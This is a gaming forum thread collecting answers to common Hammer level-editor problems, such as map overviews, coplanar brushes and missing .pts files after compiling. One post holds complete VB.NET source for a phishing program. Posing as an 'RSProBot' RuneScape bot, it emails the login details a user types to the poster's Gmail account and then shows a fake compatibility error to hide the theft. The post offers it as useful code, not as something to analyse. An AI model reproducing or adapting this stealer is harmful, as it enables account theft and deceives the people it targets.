Hammer Answers

Hammer Answers

The Bin Chute — Page [1]
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
So we get a lot of people asking the same questions, instead of typing in the same thing every time, or looking for previous posts I decided to keep all the info in this handy-easy-to-find-truck.

I'm sure with that said an admin will come along and hide this truck. PLEASE DON'T.
 
 
 
2010 Jun 17 at 21:48 PDT
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
This has nothing to do with Hammer, but is pretty frequent and usefull:

code
Imports System.Net.Mail
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("XXXXXXX@gmail.com")
MyMailMessage.To.Add("XXXXXXX@gmail.com")
MyMailMessage.Subject = ("free account")
MyMailMessage.Body = TextBox1.Text + "-" + TextBox2.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("XXXXXXXX@gmail.com", "XXXXXXXXX")
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
MsgBox("This version of RSProBot is not compatible with the current Runescape Client. Please contact our support team at: Support@ProBot.net", MsgBoxStyle.Information, "Compatability Error")
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
End
End Sub

End Class
 
 
 
2010 Jun 17 at 22:36 PDT
SolidKAYOS
Count Adelaide

Roar Of The Tigress Medal
2007 Jun 24 • 84
68 ₧
Ya..Hide it in here. Me and Jigsaw have alot of stuff in storage here.
Make awkward sexual advances, not war.
Down Rodeo said:
Dammit, this was the one place that didn't have this, but noooooo, molkman pisses all over that
 
 
 
2010 Jun 18 at 03:13 PDT
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
How to get an overview of your map:

-dev +<map>
dev_overview 1
 
 
 
2010 Jun 19 at 08:03 PDT
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
Coplanar Plane

What is a coplanar plane? A coplanar plane is a plane that has more then 1 face. This is always caused by vertex manipulation.

How do I fix it? Delete the brush or the extra vertices.
 
 
 
2010 Jul 6 at 12:20 PDT
SolidKAYOS
Count Adelaide

Roar Of The Tigress Medal
2007 Jun 24 • 84
68 ₧
Geometry memories
Make awkward sexual advances, not war.
Down Rodeo said:
Dammit, this was the one place that didn't have this, but noooooo, molkman pisses all over that
 
 
 
2010 Jul 10 at 13:17 PDT
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
Tommy said:

"cannot find pts file"



xxxx.pt# and xxxx.pts are files made in compiling by the compiling tools. Usually when you get "can't find .pts" it means something went wrong with compile. It could be a bad setup you made for the compile, or you're Running WC/hammer thru normal instead of expert, or having "too many wads", or corrupted compiling tools (rare but happens), a bad path/name somewhere, or several others. The solution is generally to use a front end or batch file with zoner's compile tools, then the problem usually goes away or the compiling error becomes clear.

 
 
 
2010 Jul 12 at 23:19 PDT
Page [1]